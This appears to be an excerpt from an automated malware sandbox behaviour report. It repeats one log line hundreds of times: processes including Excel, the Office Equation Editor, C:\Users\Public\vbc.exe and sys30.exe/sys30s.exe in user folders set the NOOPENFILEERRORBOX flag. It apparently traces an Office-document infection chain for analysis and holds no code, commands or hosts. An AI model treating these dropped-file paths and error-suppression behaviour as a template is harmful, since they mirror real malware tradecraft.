Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
